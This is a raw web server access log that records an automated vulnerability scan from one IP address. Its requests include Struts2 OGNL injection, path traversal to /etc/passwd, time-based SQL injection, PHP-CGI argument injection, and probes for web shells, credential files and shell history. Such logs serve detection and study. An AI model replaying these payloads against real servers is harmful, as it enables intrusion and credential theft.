205.185.122.202 - - [19/Oct/2025:20:51:23 +0530] "GET /1.jsp HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:51:24 +0530] "GET /1.jspx HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:51:24 +0530] "GET /1.asp HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:51:24 +0530] "GET /userfiles;/userfiles/../WEB-INF/web.xml HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:20:51:24 +0530] "GET /vbagcpxgvk HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:24 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:25 +0530] "GET /1.aspx HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:51:25 +0530] "GET /.DS_Store HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:25 +0530] "GET /s.php HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:51:25 +0530] "POST /service/extdirect HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:51:25 +0530] "GET /yymafwsoln HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:25 +0530] "GET /index.action?testzz[%27testzz%27] HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:25 +0530] "GET /s.jsp HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:51:25 +0530] "GET /a.out HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:51:25 +0530] "GET /login.action?testzz[%27testzz%27] HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:25 +0530] "GET /s.jspx HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:51:26 +0530] "GET /tomulsyqyb HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:26 +0530] "GET /s.asp HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:51:26 +0530] "GET /s.aspx HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:51:26 +0530] "GET /temp.txt HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:51:26 +0530] "GET /x.php HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:51:26 +0530] "GET /tmp.txt HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:51:26 +0530] "POST /servlet/sendData HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:51:27 +0530] "GET /fqxipulwqy HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:27 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:27 +0530] "GET /x.jsp HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:51:27 +0530] "POST /oputilsServlet HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:51:27 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:27 +0530] "GET /x.jspx HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:51:27 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:27 +0530] "GET /index.action?testzz[%27testzz%27] HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:27 +0530] "GET /admin.html HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:27 +0530] "GET /x.asp HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:51:27 +0530] "GET /toLogin HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:51:27 +0530] "GET /login.action?testzz[%27testzz%27] HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:27 +0530] "GET /admin.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:27 +0530] "GET /x.aspx HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:51:28 +0530] "GET /admin.jsp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:28 +0530] "GET /ooxx.php HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:51:28 +0530] "GET /ooxx.jsp HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:51:28 +0530] "GET /admin.do HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:51:28 +0530] "GET /ooxx.jspx HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:28 +0530] "GET /admin.asp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:29 +0530] "GET /ooxx.asp HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:51:29 +0530] "GET /login.html HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:29 +0530] "GET /v1/agent/self HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:51:29 +0530] "GET /?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(40538*41150),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:29 +0530] "GET /ooxx.aspx HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:29 +0530] "GET /login.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:29 +0530] "GET /ltfoxssgbk HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:29 +0530] "GET /dama.php HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:51:29 +0530] "GET /tomcat.css HTTP/1.1" 206 1024
205.185.122.202 - - [19/Oct/2025:20:51:29 +0530] "GET /login.do HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:51:29 +0530] "GET /pentaho/api/repos/dashboards/editor?command=executeQuery&datasource=pentaho_operations_mart&query=select%20encode('fcwjonds','base64')&require-cfg.js HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:20:51:29 +0530] "GET /zabbix/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:51:30 +0530] "GET /dama.jsp HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:51:30 +0530] "GET /tomcat.css HTTP/1.1" 206 129
205.185.122.202 - - [19/Oct/2025:20:51:30 +0530] "GET /login.jsp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:30 +0530] "GET /dama.jspx HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:30 +0530] "GET /login.asp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:30 +0530] "GET /dama.asp HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:51:30 +0530] "GET /login HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:51:30 +0530] "GET /dama.aspx HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:31 +0530] "GET /admin HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:51:31 +0530] "GET /test.php HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:51:31 +0530] "GET /test.jsp HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:51:31 +0530] "GET /test.jspx HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:31 +0530] "POST /res/url.html HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:32 +0530] "GET /trmsrgagbi HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:32 +0530] "GET /test.asp HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:51:32 +0530] "GET /admin/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:51:32 +0530] "GET /config.json HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:51:32 +0530] "GET /test.aspx HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:32 +0530] "GET /signin HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:51:32 +0530] "GET /abgitbxecv HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:32 +0530] "GET /secure/ViewUserHover.jspa?username=apnodisl HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:20:51:32 +0530] "GET /tpobkpditf HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:32 +0530] "GET /key HTTP/1.1" 404 1000
205.185.122.202 - - [19/Oct/2025:20:51:33 +0530] "GET /phpspy.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:33 +0530] "GET /keys HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:20:51:33 +0530] "GET /jspspy.jsp HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:33 +0530] "GET /secret_key HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:33 +0530] "GET /user/login HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:33 +0530] "GET /jspspy.jspx HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:51:33 +0530] "GET /secret HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:51:34 +0530] "GET /aspxspy.aspx HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:34 +0530] "GET /.secret HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:51:34 +0530] "GET /.key HTTP/1.1" 404 1002
205.185.122.202 - - [19/Oct/2025:20:51:34 +0530] "GET /.secret_key HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:51:35 +0530] "GET /kpwshgfsci HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:35 +0530] "GET /sslvpn/img/../../../../../../etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:51:35 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:35 +0530] "GET /key.txt HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:51:35 +0530] "GET /qlplpaodak HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:35 +0530] "POST /search.php?print(979684780%2b897234190) HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:35 +0530] "GET /.idea/workspace.xml HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:20:51:35 +0530] "GET /tlobygghgu HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:35 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:36 +0530] "GET /yunoxkyslz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:36 +0530] "GET /rmewdapmxs HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:36 +0530] "GET /manager/html HTTP/1.1" 401 2473
205.185.122.202 - - [19/Oct/2025:20:51:37 +0530] "GET /drdmetndiq HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:37 +0530] "POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:38 +0530] "GET /.idea/modules.xml HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:51:38 +0530] "GET /kwcndhyghw HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:38 +0530] "GET /?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43req%5C75@org.apache.struts2.ServletActionContext@getRequest%28%29%27%29%28d%29%29&%28i2%29%28%28%27%5C43xman%5C75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28i97%29%28%28%27%5C43xman.getWriter%28%29.println%2841926*41651%29%27%29%28d%29%29&%28i99%29%28%28%27%5C43xman.getWriter%28%29.close%28%29%27%29%28d%29%29 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:38 +0530] "GET /sftp-config.json HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:20:51:38 +0530] "GET /tbkeuqcfse HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:38 +0530] "GET /api/dbstat/gettablessize HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:20:51:38 +0530] "GET /jenkins/script HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:51:39 +0530] "GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(0)))HQYx) HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:20:51:39 +0530] "GET /seuahgkabg HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:40 +0530] "GET /wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(8)))HQYx) HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:20:51:40 +0530] "GET /phpinfo.php HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:51:40 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:40 +0530] "GET /vzoscntiga HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:40 +0530] "GET /info.php HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:51:40 +0530] "GET /general/login_code.php HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:20:51:40 +0530] "GET /resin-admin/ HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:40 +0530] "GET /i.php HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:51:40 +0530] "GET /index.action?debug=command&expression=(43501*41353) HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:41 +0530] "GET /ispirit/login_code.php HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:20:51:41 +0530] "GET /tz.php HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:51:41 +0530] "GET /login.action?debug=command&expression=(43342*40195) HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:41 +0530] "GET /php.php HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:51:41 +0530] "GET /test.php HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:20:51:42 +0530] "GET /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:42 +0530] "GET /zgwtewilzr HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:42 +0530] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:20:51:42 +0530] "GET /1.php HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:51:42 +0530] "GET /.bash_history HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:51:42 +0530] "GET /p.php HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:51:42 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:42 +0530] "GET /.zsh_history HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:42 +0530] "GET /gspdkbcvbf HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:43 +0530] "GET /debug.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:43 +0530] "GET /.bashrc HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:51:43 +0530] "GET /lzbleogkow HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:43 +0530] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:20:51:43 +0530] "GET /index.action?debug=command&expression=(40201*44178) HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:43 +0530] "GET /.zshrc HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:51:43 +0530] "GET /.rediscli_history HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:51:43 +0530] "GET /login.action?debug=command&expression=(44113*40420) HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:43 +0530] "GET /.bash_profile HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:51:43 +0530] "GET /xgiiizeobw HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:44 +0530] "GET /.bash_logout HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:44 +0530] "GET /.mysql_history HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:20:51:45 +0530] "POST /pages/doenterpagevariables.action HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:20:51:45 +0530] "GET /evufhflcqh HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:45 +0530] "POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:20:51:45 +0530] "GET /etc/passwd HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:45 +0530] "GET /../../../../../../../../../../etc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:51:45 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:45 +0530] "GET /nbqqwwknvn HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:46 +0530] "GET /%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/%C0%AE%C0%AE/etc/passwd HTTP/1.1" 404 1274
205.185.122.202 - - [19/Oct/2025:20:51:46 +0530] "GET /_next/static/../server/pages-manifest.json HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:20:51:46 +0530] "GET /logs/ HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:51:46 +0530] "GET /index.action?debug=command&expression=(43136*44188) HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:46 +0530] "GET /login.action?debug=command&expression=(41033*42376) HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:47 +0530] "GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34 HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:48 +0530] "GET /yvofpygyxr HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:48 +0530] "GET /db.inc HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:20:51:48 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:48 +0530] "GET /dllixhgryn HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:48 +0530] "GET /config/database.yml HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:20:51:48 +0530] "GET /v1_0/home/jobfairol/resumelist?jobfair_id=6&keyword=1 HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:20:51:49 +0530] "GET /statistics.html HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:51:49 +0530] "GET /database.yml HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:49 +0530] "GET /index.action?debug=command&expression=(41685*43638) HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:49 +0530] "GET /kpplvldsey HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:49 +0530] "GET /login.action?debug=command&expression=(43495*40261) HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:49 +0530] "GET /db.conf HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:20:51:50 +0530] "POST /apply.cgi HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:50 +0530] "GET /dferufepko HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:50 +0530] "GET /WEB-INF/web.xml HTTP/1.1" 404 992
205.185.122.202 - - [19/Oct/2025:20:51:51 +0530] "GET $%7B41542%2A44466%7D.action HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:20:51:51 +0530] "GET /kbzvyckdiz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:51 +0530] "POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/1.1" 404 1108
205.185.122.202 - - [19/Oct/2025:20:51:51 +0530] "GET /debug.txt HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:51 +0530] "GET /gabgixlyxm HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:52 +0530] "GET /debug HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:20:51:52 +0530] "GET /gkqcntqxsz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:52 +0530] "GET /System/Info/Public HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:20:51:52 +0530] "GET /server-status HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:20:51:52 +0530] "GET /letnyktsvs HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:52 +0530] "GET /crossdomain.xml HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:20:51:53 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:53 +0530] "GET /ucedyqxlvb HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:53 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:51:53 +0530] "GET /examples/ HTTP/1.1" 200 1126
205.185.122.202 - - [19/Oct/2025:20:51:53 +0530] "GET /gxibqmwkul HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:53 +0530] "GET /index.action?redirect:%24%7B41712*41673%7D HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:53 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:51:54 +0530] "GET /login.action?redirect:%24%7B43654*41617%7D HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:54 +0530] "GET /jmx-console/HtmlAdaptor HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:20:51:54 +0530] "GET /fosagent/repl/download-file?basedir=4&filepath=../../etc/passwd HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:20:51:54 +0530] "GET /tfhymuhckw HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:54 +0530] "GET /fosagent/repl/download-snapshot?name=../../../../../../../etc/passwd HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:20:51:54 +0530] "GET /examples/servlets/servlet/SessionExample HTTP/1.1" 200 1247
205.185.122.202 - - [19/Oct/2025:20:51:54 +0530] "GET /dngkgqngfc HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:55 +0530] "GET /resin-doc/resource/tutorial/jndi-appconfig/test%3FinputFile=/etc/profile HTTP/1.1" 404 1138
205.185.122.202 - - [19/Oct/2025:20:51:55 +0530] "POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:20:51:55 +0530] "GET /clpwgpppap HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:55 +0530] "GET /giguszwpvl HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:55 +0530] "GET /nohup.out HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:55 +0530] "GET /resin-doc/viewfile/%3Fcontextpath=/&servletpath=&file=index.jsp HTTP/1.1" 404 1136
205.185.122.202 - - [19/Oct/2025:20:51:55 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:56 +0530] "GET /ycseqapnpz HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:56 +0530] "POST /auth/check HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:56 +0530] "GET /upload.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:56 +0530] "GET /index.action?redirect:http://x5h.86f4 HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:56 +0530] "GET /ecfonhdgxc HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:56 +0530] "GET /upload.jsp HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:56 +0530] "GET /login.action?redirect:http://dbb.462a HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:56 +0530] "GET /vendor/composer/LICENSE HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:20:51:57 +0530] "GET /upload.asp HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:57 +0530] "GET /xfqwbdbrmo HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:57 +0530] "GET /upload.aspx HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:51:57 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:20:51:57 +0530] "GET /debug/pprof/ HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:57 +0530] "GET /mnpnpbixea HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:57 +0530] "GET /upload.html HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:51:57 +0530] "GET /httpd.conf HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:57 +0530] "GET /upload.do HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:57 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:51:58 +0530] "GET /qsryuugcbt HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:58 +0530] "GET /report/download.php?pdf=../../../../../etc/passwd HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:20:51:58 +0530] "GET /upfile.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:58 +0530] "GET /db.sqlite HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:58 +0530] "GET /qrtzvtuggp HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:58 +0530] "GET /index.action?testzz[%27testzz%27] HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:58 +0530] "GET /upfile.jsp HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:58 +0530] "GET /db.sqlite3 HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:58 +0530] "GET /login.action?testzz[%27testzz%27] HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:20:51:58 +0530] "GET /web.config HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:58 +0530] "GET /upfile.asp HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:59 +0530] "GET /mtznagleff HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:59 +0530] "GET /upfile.aspx HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:51:59 +0530] "GET /zabbix.php?action=dashboard.view&dashboardid=1 HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:59 +0530] "GET /upfile.html HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:20:51:59 +0530] "GET /config.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:59 +0530] "GET /zabbix/zabbix.php?action=dashboard.view&dashboardid=1 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:20:51:59 +0530] "GET /zmettdttpv HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:51:59 +0530] "GET /upfile.do HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:20:51:59 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:20:52:00 +0530] "GET /config.inc HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:00 +0530] "GET /.git/index HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:20:52:00 +0530] "GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0 HTTP/1.1" 200 11250
